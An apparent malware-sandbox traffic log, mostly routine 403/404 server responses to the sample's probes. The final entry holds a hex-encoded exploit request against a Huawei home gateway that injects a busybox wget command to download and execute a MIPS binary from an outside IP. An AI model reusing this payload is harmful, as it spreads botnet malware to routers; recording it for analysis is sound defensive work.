      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: micro_httpdCache-Control: no-cacheDate: Thu, 01 Jan 1970 16:37:20 GMTContent-Type: text/htmlConnection: closeData Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 63 63 39 39 39 39 22 3e 3c 48 34 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 48 34 3e 0a 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a 3c 48 52 3e 0a 3c 41 44 44 52 45 53 53 3e 3c 41 20 48 52 45 46 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 61 63 6d 65 2e 63 6f 6d 2f 73 6f 66 74 77 61 72 65 2f 6d 69 63 72 6f 5f 68 74 74 70 64 2f 22 3e 6d 69 63 72 6f 5f 68 74 74 70 64 3c 2f 41 3e 3c 2f 41 44 44 52 45 53 53 3e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY BGCOLOR="#cc9999"><H4>404 Not Found</H4>File not found.<HR><ADDRESS><A HREF="http://www.acme.com/software/micro_httpd/">micro_httpd</A></ADDRESS></BODY></HTML>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sat, 19 Feb 2022 15:06:37 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sat, 19 Feb 2022 15:06:40 GMTServer: ApacheContent-Length: 59Keep-Alive: timeout=3, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e Data Ascii: <h1>Forbidden</h1>You don't have permission on this server.
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 19 Feb 2022 15:06:44 GMTServer: ApacheLast-Modified: Tue, 26 Apr 2016 09:36:45 GMTETag: "1e5-5316008094540;5d4493fa5d580"Accept-Ranges: bytesContent-Length: 485Vary: Accept-EncodingKeep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 20 69 64 3d 22 61 22 3e 54 68 65 20 70 61 67 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 3b 7d 3c 2f 73 74 79 6c 65 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 68 72 65 66 3d 22 2f 77 65 62 64 65 66 61 75 6c 74 2f 63 73 73 2f 65 72 72 6f 72 2e 63 73 73 22 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 68 31 20 69 64 3d 22 62 22 3e 53 6f 72 72 79 2c 20 74 68 65 20 70 61 67 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 68 31 3e 0a 20 20 20 20 3c 62 75 74 74 6f 6e 20 69 64 3d 22 63 22 20 6f 6e 63 6c 69 63 6b 3d 22 68 69 73 74 6f 72 79 2e 67 6f 28 2d 31 29 22 3e 42 61 63 6b 3c 2f 62 75 74 74 6f 6e 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 77 65 62 64 65 66 61 75 6c 74 2f 6a 73 2f 6c 6f 63 61 6c 65 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 77 65 62 64 65 66 61 75 6c 74 2f 6a 73 2f 65 72 72 6f 72 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html><head> <meta charset="utf-8"> <title id="a">The page is not found</title> <style>body{display:none;}</style> <link rel="stylesheet" type="text/css" href="/webdefault/css/error.css"></head><body> <h1 id="b">Sorry, the page you are looking for is not found.</h1> <button id="c" onclick="history.go(-1)">Back</button> <script src="/webdefault/js/locale.js"></script> <script src="/webdefault/js/error.js"></script></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: WebServer/1.0 UPnP/1.0
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Sat, 19 Feb 2022 15:06:48 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Sat, 19 Feb 2022 15:06:51 GMTContent-Type: text/htmlContent-Length: 124Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4f 6f 70 73 21 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Oops! 403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.6.2Date: Sat, 19 Feb 2022 15:39:34 GMTContent-Type: text/htmlContent-Length: 168Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 36 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.6.2</center></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Sat, 19 Feb 2022 15:06:55 GMTContent-Type: text/htmlContent-Length: 169Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 30 2e 33 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.10.3</center></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Sat, 19 Feb 2022 15:06:56 GMTContent-Type: text/htmlContent-Length: 178Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: CloudFrontDate: Sat, 19 Feb 2022 15:06:58 GMTContent-Type: text/htmlContent-Length: 167Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 43 6c 6f 75 64 46 72 6f 6e 74 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>CloudFront</center></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sat, 19 Feb 2022 15:06:58 GMTContent-Type: text/htmlContent-Length: 146Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: CloudFrontDate: Sat, 19 Feb 2022 15:06:59 GMTContent-Type: text/htmlContent-Length: 167Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 43 6c 6f 75 64 46 72 6f 6e 74 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>CloudFront</center></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: awselb/2.0Date: Sat, 19 Feb 2022 15:07:02 GMTContent-Type: text/plain; charset=utf-8Content-Length: 0Connection: keep-alive
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Sat, 19 Feb 2022 15:07:04 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sat, 19 Feb 2022 15:07:04 GMTContent-Type: text/htmlContent-Length: 146Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Sat, 19 Feb 2022 15:07:07 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Length: 0Date: Sat, 19 Feb 2022 15:07:17 GMT
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sat, 19 Feb 2022 15:07:08 GMTContent-Type: text/htmlContent-Length: 146Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Sat, 19 Feb 2022 15:07:10 GMTContent-Type: text/htmlContent-Length: 178Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 19 Feb 2022 14:54:11 GMTServer: Apache/2.2.15Content-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 73 68 65 6c 6c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /shell was not found on this server.</p></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 19 Feb 2022 15:07:11 GMTServer: Apache/2.4.18 (Ubuntu)Content-Length: 278Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 73 68 65 6c 6c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 31 38 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 31 32 37 2e 30 2e 30 2e 31 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /shell was not found on this server.</p><hr><address>Apache/2.4.18 (Ubuntu) Server at 127.0.0.1 Port 80</address></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sat, 19 Feb 2022 15:07:57 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sat, 19 Feb 2022 15:07:19 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
      Source: file1String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
      Source: file1String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
      Source: motd-news.20.drString found in binary or memory: https://ubuntu.com/blog/microk8s-memory-optimisation
      Source: unknownHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 31 37 32 2e 31 31 30 2e 32 34 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 